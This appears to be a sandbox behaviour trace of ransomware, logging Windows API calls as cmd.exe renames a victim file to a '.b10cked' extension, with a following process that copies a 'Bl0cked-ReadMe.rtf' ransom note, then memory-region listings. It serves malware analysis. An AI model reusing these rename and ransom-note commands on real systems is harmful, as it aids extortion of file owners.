[0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegCloseKey (hKey=0x40) returned 0x0 [0207.240] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16eb64 | out: phkResult=0x16eb64*=0x40) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x40, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x1, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x0, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x4, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x4) returned 0x0 [0207.240] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16eb6c, lpData=0x16eb70, lpcbData=0x16eb68*=0x1000 | out: lpType=0x16eb6c*=0x0, lpData=0x16eb70*=0x9, lpcbData=0x16eb68*=0x1000) returned 0x2 [0207.240] RegCloseKey (hKey=0x40) returned 0x0 [0207.241] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863a9 [0207.241] srand (_Seed=0x5b8863a9) [0207.241] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" [0207.241] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm\" \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked\"" [0207.241] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.241] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0207.241] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0207.241] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0207.241] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0207.241] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0207.242] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0207.242] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0207.242] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0207.242] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0207.242] GetEnvironmentStringsW () returned 0x3322e0* [0207.242] FreeEnvironmentStringsW (penv=0x3322e0) returned 1 [0207.242] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.242] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0207.242] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0207.242] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0207.242] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0207.242] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0207.242] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0207.242] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0207.242] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f930 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f930, lpFilePart=0x16f92c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f92c*="Desktop") returned 0x18 [0207.242] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.242] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f6ac | out: lpFindFileData=0x16f6ac) returned 0x330020 [0207.243] FindClose (in: hFindFile=0x330020 | out: hFindFile=0x330020) returned 1 [0207.243] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0207.243] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0207.243] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0207.243] GetEnvironmentStringsW () returned 0x332b00* [0207.244] FreeEnvironmentStringsW (penv=0x332b00) returned 1 [0207.244] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.244] GetConsoleOutputCP () returned 0x1b5 [0207.244] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.244] GetUserDefaultLCID () returned 0x409 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16fa70, cchData=128 | out: lpLCData="0") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16fa70, cchData=128 | out: lpLCData="0") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16fa70, cchData=128 | out: lpLCData="1") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0207.245] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0207.245] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0207.246] GetConsoleTitleW (in: lpConsoleTitle=0x3208e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.246] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0207.246] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0207.247] _wcsicmp (_String1="move", _String2=")") returned 68 [0207.247] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0207.247] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0207.247] _wcsicmp (_String1="IF", _String2="move") returned -4 [0207.247] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0207.247] _wcsicmp (_String1="REM", _String2="move") returned 5 [0207.247] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0207.250] GetConsoleTitleW (in: lpConsoleTitle=0x16f768, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0207.250] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CD") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="REN") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="SET") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0207.251] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="MD") returned 11 [0207.251] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0207.251] _wcsicmp (_String1="move", _String2="RD") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0207.251] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0207.251] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0207.251] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0207.251] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="VER") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0207.251] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0207.251] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0207.251] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0207.251] _wcsicmp (_String1="move", _String2="START") returned -6 [0207.252] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0207.252] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0207.252] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0207.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.253] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0207.253] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16f524, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16f51c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16f51c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0207.254] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0207.255] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0207.255] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0207.255] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0207.428] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.428] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x331e50 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0207.428] SetErrorMode (uMode=0x0) returned 0x0 [0207.428] SetErrorMode (uMode=0x1) returned 0x0 [0207.428] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16eeac, lpFilePart=0x16ee94 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x16ee94*="state.rsm") returned 0x2d [0207.428] SetErrorMode (uMode=0x0) returned 0x1 [0207.428] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1")) returned 0x10 [0207.428] _wcsicmp (_String1="state.rsm", _String2=".") returned 69 [0207.429] _wcsicmp (_String1="state.rsm", _String2="..") returned 69 [0207.429] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.429] SetErrorMode (uMode=0x0) returned 0x0 [0207.429] SetErrorMode (uMode=0x1) returned 0x0 [0207.429] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16f328, lpFilePart=0x16f0c0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x16f0c0*="state.rsm") returned 0x2d [0207.429] SetErrorMode (uMode=0x0) returned 0x1 [0207.429] SetErrorMode (uMode=0x0) returned 0x0 [0207.429] SetErrorMode (uMode=0x1) returned 0x0 [0207.429] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x16f530, lpFilePart=0x16f0c0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", lpFilePart=0x16f0c0*="state.rsm.b10cked") returned 0x35 [0207.429] SetErrorMode (uMode=0x0) returned 0x1 [0207.429] SetLastError (dwErrCode=0x0) [0207.429] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm.b10cked")) returned 0xffffffff [0207.429] GetLastError () returned 0x2 [0207.429] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x16ea3c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x16ea3c) returned 0x320e88 [0207.430] FindNextFileW (in: hFindFile=0x320e88, lpFindFileData=0x16ea3c | out: lpFindFileData=0x16ea3c) returned 0 [0207.431] GetLastError () returned 0x12 [0207.431] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0207.432] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", fInfoLevelId=0x1, lpFindFileData=0x331bf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x331bf0) returned 0x320e88 [0207.433] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", nBufferLength=0x104, lpBuffer=0x16ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked", lpFilePart=0x0) returned 0x35 [0207.433] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", nBufferLength=0x104, lpBuffer=0x16ecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm", lpFilePart=0x0) returned 0x2d [0207.433] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm")) returned 0x20 [0207.433] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm"), lpNewFileName="C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\state.rsm.b10cked" (normalized: "c:\\users\\alluse~1\\packag~1\\{f325f~1\\state.rsm.b10cked"), dwFlags=0x3) returned 1 [0207.434] FindClose (in: hFindFile=0x320e88 | out: hFindFile=0x320e88) returned 1 [0207.434] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x16ec88 | out: _Buffer=" 1") returned 9 [0207.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.434] GetFileType (hFile=0x7) returned 0x2 [0207.434] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0207.434] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ec14 | out: lpMode=0x16ec14) returned 1 [0207.434] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.435] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x16ec48 | out: lpConsoleScreenBufferInfo=0x16ec48) returned 1 [0207.435] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0207.435] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x16ec88 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0207.435] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x16ec6c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x16ec6c*=0x1a) returned 1 [0207.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.436] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.436] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.436] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.436] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.436] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.437] SetConsoleInputExeNameW () returned 0x1 [0207.437] GetConsoleOutputCP () returned 0x1b5 [0207.437] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.437] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.437] exit (_Code=0) Process: id = "500" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea169e0" os_pid = "0x924" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30526 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30527 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 30528 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 30529 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 30530 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30531 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30532 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30533 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30534 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30535 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30570 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30571 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30572 start_va = 0x200000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 30573 start_va = 0x300000 end_va = 0x366fff entry_point = 0x300000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30574 start_va = 0x3f0000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 30575 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file 